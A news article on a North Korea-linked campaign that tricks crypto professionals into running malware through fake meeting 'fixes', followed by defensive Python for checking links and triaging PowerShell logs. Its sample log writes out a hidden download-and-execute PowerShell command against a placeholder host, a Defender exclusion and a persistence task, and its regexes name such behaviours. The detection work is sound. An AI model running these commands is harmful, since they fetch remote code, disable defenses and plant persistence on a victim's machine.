A sophisticated hacking campaign linked to North Korea has emerged, targeting professionals in the cryptocurrency and Web3 sectors. The group, identified as UNC1069, lures victims into fake online meetings, ultimately infecting their systems with malware aimed at stealing digital assets.
Deceptive Tactics to Gain Trust
UNC1069 masquerades as venture capital firms seeking investment opportunities, skillfully building rapport with targets. They launch attacks by leveraging counterfeit video conferencing platforms. The operation is financially driven, with proceeds potentially funding North Korea’s missile and nuclear agendas.
The group’s initial contact often occurs through platforms like LinkedIn and Telegram, where they use compromised accounts to appear credible. Meetings are set up using Calendly links, which lead victims to convincing imitations of popular video conferencing services such as Zoom, Google Meet, and Microsoft Teams. In certain instances, deepfake technology is employed to further deceive participants.
Technical Intrusion and Malware Deployment
Upon joining these fake meetings, victims are manipulated into believing their audio or video settings are malfunctioning. The attackers create urgency, prompting them to execute a script that introduces malware into their systems. This malware, identified as an evolved form of Cabbage RAT, is tailored to the victim’s OS, whether Windows, macOS, or Linux.
Research by Validin in April 2026 exposed the intricate infrastructure supporting these attacks, linking UNC1069 to the Axios NPM package compromise and other known threat clusters. The malware’s capabilities include recording real-time audio and video, which is then used in subsequent attacks.
Implications and Security Recommendations
The impact extends beyond system compromise, as attackers exploit captured media for future social engineering efforts. On Windows systems, the infection process involves deceptive prompts that execute PowerShell scripts, altering system defenses and establishing persistence.
Security experts advise organizations in the crypto and Web3 space to verify meeting requests through secure channels and remain vigilant for unusual script activity. Monitoring for anomalous connections and unexpected system changes is crucial in mitigating these threats.
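The two recommendations above, verifying meeting links and watching for unusual script activity, can be turned into concrete checks. The following is an added example written for this article, not code from the original page, from Validin, or from any of the vendors named: it checks whether a meeting link really points at Zoom, Google Meet or Microsoft Teams rather than a lookalike host, and scores exported PowerShell script-block log entries for the behaviours the Windows chain is said to involve (a pasted download-and-run command, tampering with defenses, and persistence). The allowlisted domains, the regular-expression heuristics, the `.invalid` hostnames and the sample log lines are all assumptions constructed for illustration, not indicators published anywhere.

```python
"""Defender-side triage helpers for the fake-meeting lure described above.

1. is_legitimate_meeting_link(url): does a meeting link point at the real
   conferencing service, or at a lookalike domain?
2. flagged_behaviours(text) / triage_log(log): heuristic red flags in
   PowerShell script-block text such as a victim is told to paste to "fix"
   their audio or video.

Everything below (allowlist, regexes, sample log) is an assumption built for
this example; the .invalid hosts are reserved placeholder names.
"""
import re
from urllib.parse import urlparse

# Assumed allowlist of real conferencing domains; matching is on the host,
# anchored at a dot boundary, so "zoom-us.invalid" or "zoom.us.invalid" fail.
LEGIT_MEETING_DOMAINS = {
    "zoom.us",
    "meet.google.com",
    "teams.microsoft.com",
    "teams.live.com",
}


def _host_matches(host: str, domain: str) -> bool:
    return host == domain or host.endswith("." + domain)


def is_legitimate_meeting_link(url: str) -> bool:
    """True only if the link is http(s) and its host is an allowlisted
    conferencing domain or a subdomain of one. urlparse().hostname strips
    any user@ prefix, so "https://zoom.us@evil.invalid/" is judged on
    evil.invalid, not on the decoy text before the @."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False
    host = (parsed.hostname or "").lower().rstrip(".")
    return any(_host_matches(host, d) for d in LEGIT_MEETING_DOMAINS)


# Assumed heuristics, one per behaviour the article attributes to the
# Windows infection chain. Order matters: results are reported in this order.
SCRIPT_RED_FLAGS = [
    ("hidden_or_bypass",
     re.compile(r"-(?:w(?:indowstyle)?\s+hidden|ep\s+bypass|"
                r"executionpolicy\s+bypass|nop|noprofile)", re.I)),
    ("encoded_command",
     re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_and_execute",
     re.compile(r"(?:iex|invoke-expression|invoke-webrequest|iwr|"
                r"downloadstring|downloadfile|curl|wget)", re.I)),
    ("defender_tampering",
     re.compile(r"set-mppreference|add-mppreference|exclusionpath|"
                r"disablerealtimemonitoring", re.I)),
    ("persistence",
     re.compile(r"schtasks|register-scheduledtask|currentversion\\run|"
                r"new-itemproperty.*\\run", re.I)),
]


def flagged_behaviours(script_text: str) -> list[str]:
    """Names of every heuristic that fires on one script-block text."""
    return [name for name, rx in SCRIPT_RED_FLAGS if rx.search(script_text)]


# Constructed sample of exported script-block log entries (not real
# telemetry). Each line is "<timestamp>|<event id>|<script text>"; 4104 is
# the Windows PowerShell script-block logging event id.
SAMPLE_LOG = """\
2026-04-01T10:02:11Z|4104|Get-ChildItem C:\\Users\\alice\\Documents
2026-04-01T10:05:40Z|4104|powershell -nop -w hidden -ep bypass -c "iex (iwr http://meeting-fix.invalid/audio.ps1 -UseBasicParsing)"
2026-04-01T10:05:42Z|4104|Add-MpPreference -ExclusionPath C:\\Users\\alice\\AppData\\Local\\Temp
2026-04-01T10:05:45Z|4104|schtasks /create /tn AudioDriverUpdate /tr C:\\Users\\alice\\AppData\\Local\\Temp\\fix.exe /sc onlogon
2026-04-01T10:09:00Z|4104|Get-Process | Sort-Object CPU -Descending | Select-Object -First 5
"""


def triage_log(log_text: str, threshold: int = 1) -> list[tuple[str, list[str]]]:
    """Return (timestamp, flags) for each 4104 entry whose number of fired
    heuristics reaches the threshold; benign admin commands produce nothing."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        timestamp, event_id, script = line.split("|", 2)
        if event_id != "4104":
            continue
        flags = flagged_behaviours(script)
        if len(flags) >= threshold:
            findings.append((timestamp, flags))
    return findings


def campaign_chain_present(findings: list[tuple[str, list[str]]]) -> bool:
    """True when the findings together show the full chain the article
    describes: something was downloaded and run, defenses were altered, and
    persistence was established. Any one alone is a weaker signal."""
    seen = {flag for _, flags in findings for flag in flags}
    return {"download_and_execute", "defender_tampering", "persistence"} <= seen


if __name__ == "__main__":
    for ts, flags in triage_log(SAMPLE_LOG):
        print(ts, ", ".join(flags))
    print("full chain present:", campaign_chain_present(triage_log(SAMPLE_LOG)))
```

The link check deliberately compares hosts rather than searching the URL for the word "zoom", since a lookalike registered under a different domain, or a decoy before an `@`, is exactly what a substring search would wave through. The log heuristics are coarse by design: a single hit such as a scheduled task is routine on many hosts, so `campaign_chain_present` looks for the sequence of behaviours together before treating the activity as this lure.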
